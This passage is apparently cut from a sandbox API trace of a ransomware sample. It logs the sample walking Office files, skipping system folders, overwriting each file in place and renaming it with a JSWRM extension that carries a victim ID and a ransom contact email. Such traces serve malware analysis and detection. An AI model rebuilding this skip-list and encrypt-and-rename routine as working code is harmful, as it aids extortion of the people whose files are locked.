out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0113.239] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0113.239] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0113.239] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0113.239] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0113.239] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0113.239] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0113.239] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b2b8 [0113.239] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f848 [0113.239] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b2b8 | out: hHeap=0x1e0000) returned 1 [0113.239] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0113.239] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\office32ww.msi.16_office32ww.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\office32ww.msi.16_office32ww.mcxml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\office32ww.msi.16_office32ww.mcxml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\office32ww.msi.16_office32ww.mcxml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0113.240] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f848 | out: hHeap=0x1e0000) returned 1 [0113.240] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0113.240] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0113.240] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0113.240] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0113.240] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x117f066f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x117f066f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x128c7033, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x67260, dwReserved0=0x60002, dwReserved1=0x2097ea, cFileName="OneNote.x-none.msi.16_mondoww.mcxml", cAlternateFileName="ONENOT~1.MCX")) returned 1 [0113.240] lstrcmpiW (lpString1="OneNote.x-none.msi.16_mondoww.mcxml", lpString2=".") returned 1 [0113.240] lstrcmpiW (lpString1="OneNote.x-none.msi.16_mondoww.mcxml", lpString2="..") returned 1 [0113.240] lstrcmpiW (lpString1="OneNote.x-none.msi.16_mondoww.mcxml", lpString2="...") returned 1 [0113.240] lstrcmpiW (lpString1="OneNote.x-none.msi.16_mondoww.mcxml", lpString2="windows") returned -1 [0113.240] lstrcmpiW (lpString1="OneNote.x-none.msi.16_mondoww.mcxml", lpString2="recovery") returned -1 [0113.240] lstrcmpiW (lpString1="OneNote.x-none.msi.16_mondoww.mcxml", lpString2="perflogs") returned -1 [0113.240] lstrcmpiW (lpString1="OneNote.x-none.msi.16_mondoww.mcxml", lpString2="documents and settings") returned 1 [0113.240] lstrcmpiW (lpString1="OneNote.x-none.msi.16_mondoww.mcxml", lpString2="$RECYCLE.BIN") returned 1 [0113.240] lstrcmpiW (lpString1="OneNote.x-none.msi.16_mondoww.mcxml", lpString2="system volume information") returned -1 [0113.240] lstrcmpiW (lpString1="OneNote.x-none.msi.16_mondoww.mcxml", lpString2="msocache") returned 1 [0113.240] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c2d0 [0113.240] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNote.x-none.msi.16_mondoww.mcxml", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0113.240] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0113.240] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNote.x-none.msi.16_mondoww.mcxml", cchWideChar=35, lpMultiByteStr=0x22d0a0, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNote.x-none.msi.16_mondoww.mcxml", lpUsedDefaultChar=0x0) returned 35 [0113.240] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c2d0 | out: hHeap=0x1e0000) returned 1 [0113.240] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c220 [0113.241] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNote.x-none.msi.16_mondoww.mcxml", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0113.241] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0113.241] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNote.x-none.msi.16_mondoww.mcxml", cchWideChar=35, lpMultiByteStr=0x22cdc8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNote.x-none.msi.16_mondoww.mcxml", lpUsedDefaultChar=0x0) returned 35 [0113.241] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c220 | out: hHeap=0x1e0000) returned 1 [0113.241] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0113.241] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0113.241] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0113.241] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0113.241] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0113.241] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\OneNote.x-none.msi.16_mondoww.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\onenote.x-none.msi.16_mondoww.mcxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0113.242] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=422496) returned 1 [0113.242] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.242] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24c1d0 [0113.242] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0113.255] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.255] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0113.255] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0113.255] CloseHandle (hObject=0x238) returned 1 [0113.255] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0113.255] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0113.255] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0113.255] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0113.255] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0113.255] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0113.255] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0113.255] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0113.256] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0113.256] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0113.256] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b510 [0113.256] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f158 [0113.256] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b510 | out: hHeap=0x1e0000) returned 1 [0113.256] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0113.256] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\OneNote.x-none.msi.16_mondoww.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\onenote.x-none.msi.16_mondoww.mcxml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\OneNote.x-none.msi.16_mondoww.mcxml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\onenote.x-none.msi.16_mondoww.mcxml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0113.257] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f158 | out: hHeap=0x1e0000) returned 1 [0113.257] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0113.257] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0113.257] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0113.257] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0113.257] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x128a0e2b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x128a0e2b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x128a0e2b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd4, dwReserved0=0x60002, dwReserved1=0x2097ea, cFileName="OneNote.x-none.msi.16_OneNote.mcxml", cAlternateFileName="ONENOT~2.MCX")) returned 1 [0113.257] lstrcmpiW (lpString1="OneNote.x-none.msi.16_OneNote.mcxml", lpString2=".") returned 1 [0113.257] lstrcmpiW (lpString1="OneNote.x-none.msi.16_OneNote.mcxml", lpString2="..") returned 1 [0113.257] lstrcmpiW (lpString1="OneNote.x-none.msi.16_OneNote.mcxml", lpString2="...") returned 1 [0113.257] lstrcmpiW (lpString1="OneNote.x-none.msi.16_OneNote.mcxml", lpString2="windows") returned -1 [0113.257] lstrcmpiW (lpString1="OneNote.x-none.msi.16_OneNote.mcxml", lpString2="recovery") returned -1 [0113.257] lstrcmpiW (lpString1="OneNote.x-none.msi.16_OneNote.mcxml", lpString2="perflogs") returned -1 [0113.257] lstrcmpiW (lpString1="OneNote.x-none.msi.16_OneNote.mcxml", lpString2="documents and settings") returned 1 [0113.257] lstrcmpiW (lpString1="OneNote.x-none.msi.16_OneNote.mcxml", lpString2="$RECYCLE.BIN") returned 1 [0113.257] lstrcmpiW (lpString1="OneNote.x-none.msi.16_OneNote.mcxml", lpString2="system volume information") returned -1 [0113.257] lstrcmpiW (lpString1="OneNote.x-none.msi.16_OneNote.mcxml", lpString2="msocache") returned 1 [0113.257] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0113.257] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNote.x-none.msi.16_OneNote.mcxml", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0113.257] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0113.257] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNote.x-none.msi.16_OneNote.mcxml", cchWideChar=35, lpMultiByteStr=0x22d0a0, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNote.x-none.msi.16_OneNote.mcxml", lpUsedDefaultChar=0x0) returned 35 [0113.257] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0113.257] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c3d8 [0113.257] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNote.x-none.msi.16_OneNote.mcxml", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0113.258] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0113.258] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNote.x-none.msi.16_OneNote.mcxml", cchWideChar=35, lpMultiByteStr=0x22cdc8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNote.x-none.msi.16_OneNote.mcxml", lpUsedDefaultChar=0x0) returned 35 [0113.258] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c3d8 | out: hHeap=0x1e0000) returned 1 [0113.258] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0113.258] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0113.258] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0113.258] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0113.258] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0113.258] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\OneNote.x-none.msi.16_OneNote.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\onenote.x-none.msi.16_onenote.mcxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0113.290] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=212) returned 1 [0113.290] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.290] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0113.290] ReadFile (in: hFile=0x238, lpBuffer=0x22ea18, nNumberOfBytesToRead=0xd0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x22ea18*, lpNumberOfBytesRead=0x345e89c*=0xd0, lpOverlapped=0x0) returned 1 [0113.291] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.291] WriteFile (in: hFile=0x238, lpBuffer=0x22ea18*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x22ea18*, lpNumberOfBytesWritten=0x345e898*=0xd0, lpOverlapped=0x0) returned 1 [0113.291] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0113.291] CloseHandle (hObject=0x238) returned 1 [0113.292] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0113.292] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0113.292] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0113.292] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0113.292] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0113.292] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0113.292] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0113.292] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0113.292] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0113.292] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0113.292] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b1f0 [0113.292] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f280 [0113.292] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1f0 | out: hHeap=0x1e0000) returned 1 [0113.292] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0113.292] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\OneNote.x-none.msi.16_OneNote.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\onenote.x-none.msi.16_onenote.mcxml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\OneNote.x-none.msi.16_OneNote.mcxml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\onenote.x-none.msi.16_onenote.mcxml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0113.293] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f280 | out: hHeap=0x1e0000) returned 1 [0113.293] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0113.293] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0113.293] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0113.293] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0113.293] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x116e5533, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x116e5533, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x117f066f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x84a2, dwReserved0=0x60002, dwReserved1=0x2097ea, cFileName="OSM.x-none.msi.16_mondoww.mcxml", cAlternateFileName="OSMX-N~1.MCX")) returned 1 [0113.293] lstrcmpiW (lpString1="OSM.x-none.msi.16_mondoww.mcxml", lpString2=".") returned 1 [0113.293] lstrcmpiW (lpString1="OSM.x-none.msi.16_mondoww.mcxml", lpString2="..") returned 1 [0113.293] lstrcmpiW (lpString1="OSM.x-none.msi.16_mondoww.mcxml", lpString2="...") returned 1 [0113.293] lstrcmpiW (lpString1="OSM.x-none.msi.16_mondoww.mcxml", lpString2="windows") returned -1 [0113.293] lstrcmpiW (lpString1="OSM.x-none.msi.16_mondoww.mcxml", lpString2="recovery") returned -1 [0113.293] lstrcmpiW (lpString1="OSM.x-none.msi.16_mondoww.mcxml", lpString2="perflogs") returned -1 [0113.293] lstrcmpiW (lpString1="OSM.x-none.msi.16_mondoww.mcxml", lpString2="documents and settings") returned 1 [0113.293] lstrcmpiW (lpString1="OSM.x-none.msi.16_mondoww.mcxml", lpString2="$RECYCLE.BIN") returned 1 [0113.293] lstrcmpiW (lpString1="OSM.x-none.msi.16_mondoww.mcxml", lpString2="system volume information") returned -1 [0113.293] lstrcmpiW (lpString1="OSM.x-none.msi.16_mondoww.mcxml", lpString2="msocache") returned 1 [0113.293] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0113.293] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OSM.x-none.msi.16_mondoww.mcxml", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0113.293] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0113.294] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OSM.x-none.msi.16_mondoww.mcxml", cchWideChar=31, lpMultiByteStr=0x240fc0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OSM.x-none.msi.16_mondoww.mcxml", lpUsedDefaultChar=0x0) returned 31 [0113.294] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0113.294] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0113.294] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OSM.x-none.msi.16_mondoww.mcxml", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0113.294] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0113.294] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OSM.x-none.msi.16_mondoww.mcxml", cchWideChar=31, lpMultiByteStr=0x240f48, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OSM.x-none.msi.16_mondoww.mcxml", lpUsedDefaultChar=0x0) returned 31 [0113.294] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0113.294] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0113.294] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0113.294] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0113.294] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0113.294] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0113.294] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\OSM.x-none.msi.16_mondoww.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\osm.x-none.msi.16_mondoww.mcxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0113.295] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=33954) returned 1 [0113.295] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.295] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x84a0) returned 0x24c1d0 [0113.295] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x84a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x84a0, lpOverlapped=0x0) returned 1 [0113.298] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.298] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x84a0, 